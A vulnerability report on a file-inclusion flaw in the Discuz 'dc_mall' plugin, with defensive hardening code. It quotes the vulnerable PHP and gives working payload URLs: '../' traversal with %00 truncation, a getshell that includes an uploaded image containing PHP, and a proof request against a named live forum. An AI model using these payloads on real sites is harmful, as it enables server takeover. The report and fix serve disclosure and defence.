### Brief description: Design flaw

### Details:

# Discuz credit mall plugin arbitrary file inclusion (tested on the latest version)

# Plugin info: http://addon.discuz.com/?@dc_mall.plugin

Official install count 3000+ (that is already quite a few)

[![图片1.png](https://images.seebug.org/upload/201508/0319354340be9f11eca155416f7a12dd4be5be01.png)](https://images.seebug.org/upload/201508/0319354340be9f11eca155416f7a12dd4be5be01.png)

[![图片4.png](https://images.seebug.org/upload/201508/03193843ff7c8ede2715b4f8f168ef2c7f1630d1.png)](https://images.seebug.org/upload/201508/03193843ff7c8ede2715b4f8f168ef2c7f1630d1.png)

A quick keyword search:

# It took me half a day to get the cloud platform service working... finally able to install plugins...

# Test environment:

PHP version: 5.2.9-2, magic_quotes_gpc = off

# Let's look at the code first: dc_mall.inc.php (the vulnerable file)

```php
<?php
if(!defined('IN_DISCUZ')) {
    exit('Access Denied');
}
$_lang = lang('plugin/dc_mall');
$action = $_GET['action'] ? $_GET['action'] : 'index';
$version ='Ver 1.1.1';
$cvar = $_G['cache']['plugin']['dc_mall'];
// The action parameter is passed into $file without any filtering; appending %00 truncates
// the ".inc.php" suffix, so any file can be included.
$file = DISCUZ_ROOT.'./source/plugin/dc_mall/module/index/'.$action.'.inc.php';
if (!file_exists($file)||!$cvar['open']) showmessage('undefined_action');
$usercredit = getuserprofile('extcredits'.$cvar['credit']);
$mallnav = C::t('#dc_mall#dc_mall_sort')->getdata();
$sortid = dintval($_GET['sortid']);
if(empty($mallnav[$sortid]))$sortid=0;
@include $file;
$croppath = DISCUZ_ROOT.'./source/plugin/dc_mall/data/cron.php';
$cronupdate = @include $croppath;
if(TIMESTAMP-$cronupdate['timestamp']>$cvar['autotime']*60){
    require_once DISCUZ_ROOT.'./source/plugin/dc_mall/cache/cache_mallinfo.php';
    build_cache_plugin_mallinfo();
    $configdata = 'return '.var_export(array('timestamp'=>TIMESTAMP), true).";\n\n";
    if($fp = @fopen($croppath, 'wb')) {
        fwrite($fp, "<?php\n//plugin mall temp upgrade check file, DO NOT modify me!\n//Identify: ".md5($configdata)."\n\n$configdata?>");
        fclose($fp);
    }
}
include template('dc_mall:index/'.$action);
?>
```

# Inclusion test

[![图片2.png](https://images.seebug.org/upload/201508/031936395bfde0824b37810666dde38f70794f85.png)](https://images.seebug.org/upload/201508/031936395bfde0824b37810666dde38f70794f85.png)

# getshell

How to get a shell needs no further explanation: upload an image with embedded PHP through the front end, then include it directly and it works:

www.xxx.com/plugin.php?action=../../../../../data/attachment/forum/201508/02/153404ryzl4yytgyz4yjrl.jpg%00&id=dc_mall

[![图片3.png](https://images.seebug.org/upload/201508/03193700768ff9afe86e04b8f19d23a9ada50c4a.png)](https://images.seebug.org/upload/201508/03193700768ff9afe86e04b8f19d23a9ada50c4a.png)

### Proof of vulnerability:

# http://bbs.medkaoyan.net/plugin.php?action=../../../../../robots.txt%00&id=dc_mall
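The root cause above is that `$action` flows straight from `$_GET` into the include path, and on the tested PHP 5.2.9 a `%00` byte truncates the `.inc.php` suffix. The following is an added example, not the plugin's or Discuz's own code, of how that dispatch can be hardened: the action name is allowlisted to a plain identifier (which by itself removes `../`, slashes and NUL bytes), and the resolved file is then checked with `realpath()` to be inside the module directory. The function name `dc_mall_resolve_action` and the temporary directory layout it is demonstrated on are assumptions made for the example.

```php
<?php
// Added example (not the plugin's own code): hardened replacement for the
// "$file = ... . $action . '.inc.php'" dispatch in dc_mall.inc.php.
// The function name and the demo directory layout are assumptions.

/**
 * Map a user-supplied action name to an include file inside $moduleDir.
 * Returns the absolute path on success, or null when the request should be
 * answered with showmessage('undefined_action') instead of an include.
 */
function dc_mall_resolve_action($action, $moduleDir) {
    // 1. Missing or empty value defaults to 'index', as in the original.
    if (!is_string($action) || $action === '') {
        $action = 'index';
    }
    // 2. Allowlist the character set. "../", "/", "\\" and "\0" (the %00
    //    truncation used in the report) can never pass this anchored regex,
    //    so the fix does not depend on the PHP version's NUL-byte handling.
    if (!preg_match('/^[a-z0-9_]{1,32}$/D', $action)) {
        return null;
    }
    // 3. Defence in depth: resolve both sides and require containment.
    $base = realpath($moduleDir);
    $candidate = ($base === false) ? false
        : realpath($base . DIRECTORY_SEPARATOR . $action . '.inc.php');
    if ($candidate === false || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null; // file absent, or resolved outside the module directory
    }
    return $candidate;
}

// --- Self-contained demonstration on a constructed directory layout ---------
$tmp = sys_get_temp_dir() . '/dc_mall_demo_' . getmypid();
$moduleDir = $tmp . '/source/plugin/dc_mall/module/index';
mkdir($moduleDir, 0700, true);
file_put_contents($moduleDir . '/index.inc.php', "<?php echo 'index module';\n");
file_put_contents($tmp . '/robots.txt', "User-agent: *\n"); // stand-in for the PoC target

$cases = array(
    'index',                        // legitimate module
    "../../../../robots.txt\0",     // the %00 traversal from the report, URL-decoded
    '../../../../robots.txt',       // plain traversal without the NUL byte
    'index.inc.php/../index',       // slash/dot tricks
    'nosuchmodule',                 // valid syntax, but no such file
);
foreach ($cases as $c) {
    $r = dc_mall_resolve_action($c, $moduleDir);
    printf("%-30s => %s\n", addcslashes($c, "\0"),
        $r === null ? 'REJECT (undefined_action)' : 'include ' . $r);
}

// Clean up the demo tree.
unlink($moduleDir . '/index.inc.php');
unlink($tmp . '/robots.txt');
for ($d = $moduleDir; $d !== $tmp; $d = dirname($d)) {
    rmdir($d);
}
rmdir($tmp);
```

Only the first case resolves to an include path; the four others return `null`. The allowlist is the real fix: PHP 5.3.4 and later reject NUL bytes in filesystem paths, which defeats the `%00` truncation, but the plain `../` traversal and `file_exists()`-assisted probing would still work without the identifier check, so the hardening must not rely on the PHP version alone.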